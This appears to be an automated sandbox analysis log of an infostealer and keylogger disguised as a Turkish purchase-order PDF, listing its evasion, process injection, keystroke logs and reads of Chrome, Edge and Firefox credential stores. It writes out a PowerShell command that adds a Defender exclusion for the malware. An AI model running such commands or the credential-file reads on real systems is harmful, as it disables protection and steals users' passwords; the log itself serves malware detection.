                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397390
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397052
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396469
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396359
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396250
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396141
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396031
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395593
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395265
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395042
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394825
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394718
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394541
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394437
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394218
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1318702019.0000000000A92000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2548739831.0000000006030000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Memory written: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Memory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Process created: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe "C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerLR
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q9<b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}rTH
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q?<b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}r{Win}rTH
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q3<b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q><b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}r{Win}TH
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002D2D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Time: 07/19/2024 18:06:08<br>User Name: user<br>Computer Name: 134349<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}r{Win}r
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q8<b>[ Program Manager]</b> (23/05/2024 18:42:29)<br>{Win}TH
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Queries volume information: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe VolumeInformation
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7192, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7644, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7752, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7952, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
